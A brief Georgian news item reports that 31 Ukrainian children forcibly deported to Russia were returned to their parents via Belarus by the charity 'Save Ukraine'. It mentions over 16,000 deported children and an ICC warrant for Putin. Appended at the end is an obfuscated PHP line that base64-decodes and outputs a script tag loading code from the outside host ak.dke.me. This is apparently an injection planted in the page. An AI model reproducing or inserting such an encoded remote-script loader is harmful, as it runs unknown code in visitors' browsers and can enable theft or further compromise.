celsiusi
ავერსი საქკაბელი

რუსეთში იძულებით დეპორტირებული 31 უკრაინელი ბავშვი მშობლებს დაუბრუნდა. ბავშვების დაბრუნება საქველმოქმედო ორგანიზაცია „გადავარჩინოთ უკრაინის“ ორგანიზებით მოხერხდა. ისინი რუსეთიდან, ბელარუსის გავლით, უკრაინაში ჩაიყვანეს. ერთ-ერთი გადარჩენილი ბავშვი ყვება, რომ მათ „ცხოველებივით“ ექცეოდნენ და ეუბნებოდნენ, რომ მშობლებს ისინი აღარ სურდათ.

ომის დაწყების შემდეგ საოკუპაციო ძალებმა უკრაინიდან 16 000-ზე მეტი ბავშვი იძულებით რუსეთში გაიყვანეს.

გასულ თვეს სისხლის სამართლის საერთაშორისო სასამართლომ რუსეთის პრეზიდენტის, ვლადიმირ პუტინის დაკავების ორდერი გასცა ბავშვთა უკანონო დეპორტაციისა და სამხედრო დანაშაულებისთვის.

482
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");